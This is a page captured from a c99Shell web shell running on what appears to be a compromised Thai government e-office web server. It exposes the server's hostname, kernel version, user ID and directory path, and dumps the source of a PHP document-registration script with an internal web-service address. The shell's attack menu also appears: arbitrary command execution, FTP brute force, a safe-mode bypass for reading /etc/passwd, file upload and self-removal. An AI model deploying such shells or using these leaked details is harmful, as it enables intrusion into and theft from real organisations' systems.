!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectDocNoRegisterfromCenter.php (3.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
include_once "includefile.php";
if(
$showajax=="1"){
header("content-type: application/x-javascript; charset=TIS-620");
include_once(
"../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";

}
include_once 
"../link/keyThai.php";
include_once 
"funct.php";
?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<table width=100% border="0" align="center" cellpadding="0" cellspacing="0"><tr><td>
<input name="DocNo" id="DocNo" type="text"  maxlength="50" size="25" style="FONT-SIZE: 15pt;" disabled  value="<? if($caseback=='1'){ echo a2th($DocNo2); } ?>"> <? if($RsID=="2"){  ?>
              <input name="useMainDocNo" id="useMainDocNo" type="checkbox" value="Y" onClick='return showSelectDocNoRegister();' <? if($useMainDocNo=="Y"){ echo "checked";   }?> disabled>
              &nbsp;ใช้ที่หนังสือ&nbsp;<? echo a2th($oSys->sysDocNo); ?> 
              <?  ?>
<input name="DocNo2"  id="DocNo2" type="hidden"  value="<?php echo $DocNo2;?>">
</td></tr>
</table>
<table>
<tr><td>
<?php
//**********step request doc regis from center********************
require_once('../lib/nusoap.php');
$wsdlurl 'http://203.157.2.6:8180/esrbcl_pbri/ESRBCLWS?wsdl';
$wsdlfile './eiam.wsdl';

//***********step1*****************
    
$client = new nusoap_client($wsdlfile,true);
    
$client->soap_defencoding 'UTF-8';
        
$client->decode_utf8 false;
    
$err $client->getError();
    if(
$err){
        echo 
$err;
    }

    
$request '<?xml version="1.0" encoding="utf-8"?><GovernmentDocumentRegisterRequest><GovernmentDocumentRegister><Regisbook><RegisterYear>';
    
$request .=(date('Y')+543).'</RegisterYear></Regisbook></GovernmentDocumentRegister></GovernmentDocumentRegisterRequest>';
    
$params = array('xmlRequest' => $request);
    
$result $client->call('getMinistryRegisBook',$params);
     
    if (
$client->fault) {
        echo 
'Fault'print_r($result);
    } else {
        
// Check for errors
        
$err $client->getError();
        if (
$err) {
            
// Display the error
            
echo 'Error'$err;
        } else {
            
// Display the result
            //echo 'Result' . print_r($result);      
        
}
    }
    
$result1=$result['return'];

//$result is a return result form server
// So we will use expath to detect the value

//***********step2*****************
$xml simplexml_load_string($result1);
//print_r($xml);

?>
<table width="100%%"  border=0 align="center">
    <tr><td align=left><b>เลือกสมุดทะเบียนเพื่อขอเลขทะเบียนส่ง</b></td></tr>
</table>
<table border="0" align="center" cellpadding="4" cellspacing="1" bordercolor="#DADADA">
<tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">
    <td align=center><b>เลือก</b></td>
    <td align=center><b>รหัสสมุดทะเบียน</b></td>
    <td align=center><b>ชื่อสมุด</b></td>
    <td align=center><b>ปี</b></td>
</tr>    
<?
foreach($xml->children() as $GovernmentDocumentRegister){
    foreach(
$GovernmentDocumentRegister->children() as $Regisbook => $data){
        
?>
        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
        <td align=center><input name="selectdocregis" id="selectdocregis" type="radio" value="<? echo $data->RegisterID?>"   onClick="checkradio('<? echo $data->RegisterID?>','<? echo iconv('UTF-8','TIS-620',$data->RegisterName); ?>','<? echo $data->RegisterYear;?>')"></td>
        <td align=center><? echo $data->RegisterID?></td>
        <td><? echo iconv('UTF-8','TIS-620',$data->RegisterName); ?></td>
        <td align=center><? echo $data->RegisterYear?></td>
        </tr>
        <?
    
}
}
?>
</td></tr>
</table>
<input type="hidden" name="RegisterName" id="RegisterName">
<input type="hidden" name="RegisterYear"  id="RegisterYear">

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--